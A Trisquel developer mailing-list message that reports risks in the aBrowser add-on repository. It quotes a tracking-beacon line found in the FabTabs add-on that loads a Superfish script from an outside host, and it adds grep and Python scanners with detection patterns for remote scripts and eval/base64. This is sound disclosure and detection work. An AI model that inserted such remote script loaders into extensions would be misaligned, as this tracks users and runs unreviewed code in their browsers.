Friendly reminder: FabTab addon is still up and this is still an issue.
On 12/01/13 12:51, Luke wrote:
> Hello, I have noticed that the Trisquel aBrowser addon repository
> is susceptible to several threat vectors.
>
> 1) Random users signing up and changing the download location of
> .xpi files. This could be used to inject malicious code to
> unknowing users.
>
> Solution: a) Assign moderators who will check addons for approval
> similar to AMO before going live.
>
> b) Whitelist certain domains, e.g. only allow the url to contain
> download links from "https://addons.mozilla.org" since they are
> generally being checked by others.
>
> 2) Non-free blobs can still exist in supposedly free code and must
> be reviewed. Taking for example a recent finding in FabTabs:
> https://trisquel.info/en/browser/addons/fabtabs
>
> While manually inspecting the code I found this interesting line
> located in "/chrome/content/fabtab/content.js":
>
> script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';
>
> This code appears to be a web beacon and directly links to
> non-free code outside of the original xpi! Thankfully this outside
> code appears only to have analytics/tracking built in and no actual
> malicious intent other than ensuring HTTPS is OFF whenever it
> queries the beacon (contains url rewrites). However this opens the
> door for much larger problems. Someone should be proactively
> studying extensions prior to upload, and/or implement a small
> filter which can catch certain artifacts at minimum.
>
> One such make-shift bash script I whipped up (could use some
> work):
>
> unzip -p *.xpi | grep "http://\|https://\|eval(base64_decode"
>
> This outputs all links and any base64 found inside of an xpi to
> the terminal, and can catch the superfish web beacon.
>
> Just some thoughts.
> :)

_______________________________________________
Trisquel-devel mailing list
http://listas.trisquel.info/mailman/listinfo/trisquel-devel
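As an added example, not part of this thread or of Trisquel's tooling, the pre-upload filter Luke sketches above carried a step further in Python: it opens an .xpi as a zip, scans only the text-like members line by line, and reports remote URLs, remote script loading and eval/base64 decoding with file and line number, so a moderator can go straight to the suspicious line. The regexes, the extension list and the sample add-on built in build_sample_xpi() are assumptions, not FabTab's real contents.

```python
"""Scan a Firefox-style .xpi (a zip) for indicators an add-on reviewer should look at:
remote URLs, remote script loading and eval/base64 decoding.
Added example: the patterns and the sample add-on are assumptions, not Trisquel tooling."""
import io
import re
import zipfile

# Indicators to flag (assumed list; extend as needed).
PATTERNS = {
    "url": re.compile(rb"https?://[^\s'\"<>]+"),
    "remote_script": re.compile(rb"script\.src\s*=|<script[^>]+src\s*=", re.I),
    "eval_decode": re.compile(rb"eval\s*\(|base64_decode|atob\s*\("),
}
# Only text-like members are scanned; images and binaries are skipped.
TEXT_EXT = (".js", ".jsm", ".xul", ".html", ".xhtml", ".json", ".rdf", ".css")

def scan_xpi(data: bytes):
    """Return (member, line_no, kind, match) tuples for an xpi given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_EXT):
                continue
            lines = zf.read(info).splitlines()
            for line_no, line in enumerate(lines, 1):
                for kind, rx in PATTERNS.items():
                    for m in rx.finditer(line):
                        findings.append((info.filename, line_no, kind, m.group(0).decode("latin-1")))
    return findings

def http_only(findings):
    """Plain-http URLs: a script fetched over http can be swapped by anyone on the path."""
    return [f for f in findings if f[2] == "url" and f[3].startswith("http://")]

def build_sample_xpi() -> bytes:
    """Constructed sample add-on (not FabTab): one clean file, one with a remote beacon."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf", "<RDF><em:id>sample@example.invalid</em:id></RDF>")
        zf.writestr("chrome/content/sample/clean.js", "var x = 1;\n")
        zf.writestr("chrome/content/sample/content.js",
                    "var script = document.createElement('script');\n"
                    "script.src = 'http://beacon.example.invalid/ws/main.jsp?userId=CONSTRUCTED';\n"
                    "eval(atob('dmFyIHk9Mjs='));\n")
    return buf.getvalue()

if __name__ == "__main__":
    for f in scan_xpi(build_sample_xpi()):
        print("%s:%d [%s] %s" % f)
```

Run against a real add-on with `scan_xpi(open("addon.xpi", "rb").read())`; a hit is a reason to read the file, not a verdict on its own.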
